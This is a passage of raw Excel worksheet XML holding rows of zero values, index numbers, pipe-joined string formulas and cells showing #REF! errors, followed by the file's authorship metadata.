        <v>0</v>
      </c>
      <c r="B31">
        <v>0</v>
      </c>
      <c r="C31">
        <v>0</v>
      </c>
      <c r="D31" s="18">
        <v>0</v>
      </c>
      <c r="H31" s="11">
        <v>18</v>
      </c>
      <c r="I31" t="str">
        <f t="shared" si="0"/>
        <v>18|0|0|0|0</v>
      </c>
      <c r="J31" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="32" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A32" s="16">
        <v>0</v>
      </c>
      <c r="B32">
        <v>0</v>
      </c>
      <c r="C32">
        <v>0</v>
      </c>
      <c r="D32" s="18">
        <v>0</v>
      </c>
      <c r="H32" s="11">
        <v>19</v>
      </c>
      <c r="I32" t="str">
        <f t="shared" si="0"/>
        <v>19|0|0|0|0</v>
      </c>
      <c r="J32" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="33" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A33" s="16">
        <v>0</v>
      </c>
      <c r="B33">
        <v>0</v>
      </c>
      <c r="C33">
        <v>0</v>
      </c>
      <c r="D33" s="18">
        <v>0</v>
      </c>
      <c r="H33" s="11">
        <v>20</v>
      </c>
      <c r="I33" t="str">
        <f t="shared" si="0"/>
        <v>20|0|0|0|0</v>
      </c>
      <c r="J33" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="34" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A34" s="16">
        <v>0</v>
      </c>
      <c r="B34">
        <v>0</v>
      </c>
      <c r="C34">
        <v>0</v>
      </c>
      <c r="D34" s="18">
        <v>0</v>
      </c>
      <c r="H34" s="11">
        <v>21</v>
      </c>
      <c r="I34" t="str">
        <f t="shared" si="0"/>
        <v>21|0|0|0|0</v>
      </c>
      <c r="J34" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="35" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A35" s="16">
        <v>0</v>
      </c>
      <c r="B35">
        <v>0</v>
      </c>
      <c r="C35">
        <v>0</v>
      </c>
      <c r="D35" s="18">
        <v>0</v>
      </c>
      <c r="H35" s="11">
        <v>22</v>
      </c>
      <c r="I35" t="str">
        <f t="shared" si="0"/>
        <v>22|0|0|0|0</v>
      </c>
      <c r="J35" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="36" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A36" s="16">
        <v>0</v>
      </c>
      <c r="B36">
        <v>0</v>
      </c>
      <c r="C36">
        <v>0</v>
      </c>
      <c r="D36" s="18">
        <v>0</v>
      </c>
      <c r="H36" s="11">
        <v>23</v>
      </c>
      <c r="I36" t="str">
        <f t="shared" si="0"/>
        <v>23|0|0|0|0</v>
      </c>
      <c r="J36" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="37" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A37" s="16">
        <v>0</v>
      </c>
      <c r="B37">
        <v>0</v>
      </c>
      <c r="C37">
        <v>0</v>
      </c>
      <c r="D37" s="18">
        <v>0</v>
      </c>
      <c r="H37" s="11">
        <v>24</v>
      </c>
      <c r="I37" t="str">
        <f t="shared" si="0"/>
        <v>24|0|0|0|0</v>
      </c>
      <c r="J37" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="38" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A38" s="16">
        <v>0</v>
      </c>
      <c r="B38">
        <v>0</v>
      </c>
      <c r="C38">
        <v>0</v>
      </c>
      <c r="D38" s="18">
        <v>0</v>
      </c>
      <c r="H38" s="11">
        <v>25</v>
      </c>
      <c r="I38" t="str">
        <f t="shared" si="0"/>
        <v>25|0|0|0|0</v>
      </c>
      <c r="J38" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="39" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A39" s="16">
        <v>0</v>
      </c>
      <c r="B39">
        <v>0</v>
      </c>
      <c r="C39">
        <v>0</v>
      </c>
      <c r="D39" s="18">
        <v>0</v>
      </c>
      <c r="H39" s="11">
        <v>26</v>
      </c>
      <c r="I39" t="str">
        <f t="shared" si="0"/>
        <v>26|0|0|0|0</v>
      </c>
      <c r="J39" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="40" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A40" s="16">
        <v>0</v>
      </c>
      <c r="B40">
        <v>0</v>
      </c>
      <c r="C40">
        <v>0</v>
      </c>
      <c r="D40" s="18">
        <v>0</v>
      </c>
      <c r="H40" s="11">
        <v>27</v>
      </c>
      <c r="I40" t="str">
        <f t="shared" si="0"/>
        <v>27|0|0|0|0</v>
      </c>
      <c r="J40" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="41" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A41" s="16">
        <v>0</v>
      </c>
      <c r="B41">
        <v>0</v>
      </c>
      <c r="C41">
        <v>0</v>
      </c>
      <c r="D41" s="18">
        <v>0</v>
      </c>
      <c r="H41" s="11">
        <v>28</v>
      </c>
      <c r="I41" t="str">
        <f t="shared" si="0"/>
        <v>28|0|0|0|0</v>
      </c>
      <c r="J41" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="42" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A42" s="16">
        <v>0</v>
      </c>
      <c r="B42">
        <v>0</v>
      </c>
      <c r="C42">
        <v>0</v>
      </c>
      <c r="D42" s="18">
        <v>0</v>
      </c>
      <c r="H42" s="11">
        <v>29</v>
      </c>
      <c r="I42" t="str">
        <f t="shared" si="0"/>
        <v>29|0|0|0|0</v>
      </c>
      <c r="J42" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="43" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A43" s="16">
        <v>0</v>
      </c>
      <c r="B43">
        <v>0</v>
      </c>
      <c r="C43">
        <v>0</v>
      </c>
      <c r="D43" s="18">
        <v>0</v>
      </c>
      <c r="H43" s="11">
        <v>30</v>
      </c>
      <c r="I43" t="str">
        <f t="shared" si="0"/>
        <v>30|0|0|0|0</v>
      </c>
      <c r="J43" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="44" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A44" s="16">
        <v>0</v>
      </c>
      <c r="B44">
        <v>0</v>
      </c>
      <c r="C44">
        <v>0</v>
      </c>
      <c r="D44" s="18">
        <v>0</v>
      </c>
      <c r="H44" s="11">
        <v>31</v>
      </c>
      <c r="I44" t="str">
        <f t="shared" si="0"/>
        <v>31|0|0|0|0</v>
      </c>
      <c r="J44" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="45" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A45" s="16">
        <v>0</v>
      </c>
      <c r="B45">
        <v>0</v>
      </c>
      <c r="C45">
        <v>0</v>
      </c>
      <c r="D45" s="18">
        <v>0</v>
      </c>
      <c r="H45" s="11">
        <v>32</v>
      </c>
      <c r="I45" t="str">
        <f t="shared" si="0"/>
        <v>32|0|0|0|0</v>
      </c>
      <c r="J45" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="46" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A46" s="16">
        <v>0</v>
      </c>
      <c r="B46">
        <v>0</v>
      </c>
      <c r="C46">
        <v>0</v>
      </c>
      <c r="D46" s="18">
        <v>0</v>
      </c>
      <c r="H46" s="11">
        <v>33</v>
      </c>
      <c r="I46" t="str">
        <f t="shared" si="0"/>
        <v>33|0|0|0|0</v>
      </c>
      <c r="J46" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="47" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A47" s="16">
        <v>0</v>
      </c>
      <c r="B47">
        <v>0</v>
      </c>
      <c r="C47">
        <v>0</v>
      </c>
      <c r="D47" s="18">
        <v>0</v>
      </c>
      <c r="H47" s="11">
        <v>34</v>
      </c>
      <c r="I47" t="str">
        <f t="shared" si="0"/>
        <v>34|0|0|0|0</v>
      </c>
      <c r="J47" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="48" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A48" s="16">
        <v>0</v>
      </c>
      <c r="B48">
        <v>0</v>
      </c>
      <c r="C48">
        <v>0</v>
      </c>
      <c r="D48" s="18">
        <v>0</v>
      </c>
      <c r="H48" s="11">
        <v>35</v>
      </c>
      <c r="I48" t="str">
        <f t="shared" si="0"/>
        <v>35|0|0|0|0</v>
      </c>
      <c r="J48" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="49" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A49" s="16">
        <v>0</v>
      </c>
      <c r="B49">
        <v>0</v>
      </c>
      <c r="C49">
        <v>0</v>
      </c>
      <c r="D49" s="18">
        <v>0</v>
      </c>
      <c r="H49" s="11">
        <v>36</v>
      </c>
      <c r="I49" t="str">
        <f t="shared" si="0"/>
        <v>36|0|0|0|0</v>
      </c>
      <c r="J49" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="50" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A50" s="16">
        <v>0</v>
      </c>
      <c r="B50">
        <v>0</v>
      </c>
      <c r="C50">
        <v>0</v>
      </c>
      <c r="D50" s="18">
        <v>0</v>
      </c>
      <c r="H50" s="11">
        <v>37</v>
      </c>
      <c r="I50" t="str">
        <f t="shared" si="0"/>
        <v>37|0|0|0|0</v>
      </c>
      <c r="J50" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="51" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A51" s="16">
        <v>0</v>
      </c>
      <c r="B51">
        <v>0</v>
      </c>
      <c r="C51">
        <v>0</v>
      </c>
      <c r="D51" s="18">
        <v>0</v>
      </c>
      <c r="H51" s="11">
        <v>38</v>
      </c>
      <c r="I51" t="str">
        <f t="shared" si="0"/>
        <v>38|0|0|0|0</v>
      </c>
      <c r="J51" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="52" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A52" s="16">
        <v>0</v>
      </c>
      <c r="B52">
        <v>0</v>
      </c>
      <c r="C52">
        <v>0</v>
      </c>
      <c r="D52" s="18">
        <v>0</v>
      </c>
      <c r="H52" s="11">
        <v>39</v>
      </c>
      <c r="I52" t="str">
        <f t="shared" si="0"/>
        <v>39|0|0|0|0</v>
      </c>
      <c r="J52" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="53" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A53" s="16">
        <v>0</v>
      </c>
      <c r="B53">
        <v>0</v>
      </c>
      <c r="C53">
        <v>0</v>
      </c>
      <c r="D53" s="18">
        <v>0</v>
      </c>
      <c r="H53" s="11">
        <v>40</v>
      </c>
      <c r="I53" t="str">
        <f t="shared" si="0"/>
        <v>40|0|0|0|0</v>
      </c>
      <c r="J53" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="54" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A54" s="16">
        <v>0</v>
      </c>
      <c r="B54">
        <v>0</v>
      </c>
      <c r="C54">
        <v>0</v>
      </c>
      <c r="D54" s="18">
        <v>0</v>
      </c>
      <c r="H54" s="11">
        <v>41</v>
      </c>
      <c r="I54" t="str">
        <f t="shared" si="0"/>
        <v>41|0|0|0|0</v>
      </c>
      <c r="J54" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="55" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A55" s="16">
        <v>0</v>
      </c>
      <c r="B55">
        <v>0</v>
      </c>
      <c r="C55">
        <v>0</v>
      </c>
      <c r="D55" s="18">
        <v>0</v>
      </c>
      <c r="H55" s="11">
        <v>42</v>
      </c>
      <c r="I55" t="str">
        <f t="shared" si="0"/>
        <v>42|0|0|0|0</v>
      </c>
      <c r="J55" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="56" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A56" s="16">
        <v>0</v>
      </c>
      <c r="B56">
        <v>0</v>
      </c>
      <c r="C56">
        <v>0</v>
      </c>
      <c r="D56" s="18">
        <v>0</v>
      </c>
      <c r="H56" s="11">
        <v>43</v>
      </c>
      <c r="I56" t="str">
        <f t="shared" si="0"/>
        <v>43|0|0|0|0</v>
      </c>
      <c r="J56" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="57" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A57" s="16">
        <v>0</v>
      </c>
      <c r="B57">
        <v>0</v>
      </c>
      <c r="C57">
        <v>0</v>
      </c>
      <c r="D57" s="18">
        <v>0</v>
      </c>
      <c r="H57" s="11">
        <v>44</v>
      </c>
      <c r="I57" t="str">
        <f t="shared" si="0"/>
        <v>44|0|0|0|0</v>
      </c>
      <c r="J57" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="58" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A58" s="16">
        <v>0</v>
      </c>
      <c r="B58">
        <v>0</v>
      </c>
      <c r="C58">
        <v>0</v>
      </c>
      <c r="D58" s="18">
        <v>0</v>
      </c>
      <c r="H58" s="11">
        <v>45</v>
      </c>
      <c r="I58" t="str">
        <f t="shared" si="0"/>
        <v>45|0|0|0|0</v>
      </c>
      <c r="J58" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="59" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A59" s="16">
        <v>0</v>
      </c>
      <c r="B59">
        <v>0</v>
      </c>
      <c r="C59">
        <v>0</v>
      </c>
      <c r="D59" s="18">
        <v>0</v>
      </c>
      <c r="H59" s="11">
        <v>46</v>
      </c>
      <c r="I59" t="str">
        <f t="shared" si="0"/>
        <v>46|0|0|0|0</v>
      </c>
      <c r="J59" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="60" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A60" s="16">
        <v>0</v>
      </c>
      <c r="B60">
        <v>0</v>
      </c>
      <c r="C60">
        <v>0</v>
      </c>
      <c r="D60" s="18">
        <v>0</v>
      </c>
      <c r="H60" s="11">
        <v>47</v>
      </c>
      <c r="I60" t="str">
        <f t="shared" si="0"/>
        <v>47|0|0|0|0</v>
      </c>
      <c r="J60" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="61" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A61" s="16">
        <v>0</v>
      </c>
      <c r="B61">
        <v>0</v>
      </c>
      <c r="C61">
        <v>0</v>
      </c>
      <c r="D61" s="18">
        <v>0</v>
      </c>
      <c r="H61" s="11">
        <v>48</v>
      </c>
      <c r="I61" t="str">
        <f t="shared" si="0"/>
        <v>48|0|0|0|0</v>
      </c>
      <c r="J61" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="62" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A62" s="16">
        <v>0</v>
      </c>
      <c r="B62">
        <v>0</v>
      </c>
      <c r="C62">
        <v>0</v>
      </c>
      <c r="D62" s="18">
        <v>0</v>
      </c>
      <c r="H62" s="11">
        <v>49</v>
      </c>
      <c r="I62" t="str">
        <f t="shared" si="0"/>
        <v>49|0|0|0|0</v>
      </c>
      <c r="J62" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="63" spans="1:10" ht="14.65" thickBot="1" x14ac:dyDescent="0.5">
      <c r="A63" s="19">
        <v>0</v>
      </c>
      <c r="B63" s="20">
        <v>0</v>
      </c>
      <c r="C63" s="20">
        <v>0</v>
      </c>
      <c r="D63" s="21">
        <v>0</v>
      </c>
      <c r="H63" s="28">
        <v>50</v>
      </c>
      <c r="I63" s="22" t="str">
        <f t="shared" si="0"/>
        <v>50|0|0|0|0</v>
      </c>
      <c r="J63" s="29" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="64" spans="1:10" ht="14.65" thickTop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Gregson</dc:creator>
  <cp:lastModifiedBy>Jonathan Gregson</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-29T20:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-01T23:46:17Z</dcterms:modified>
</cp:coreProperties>
</file>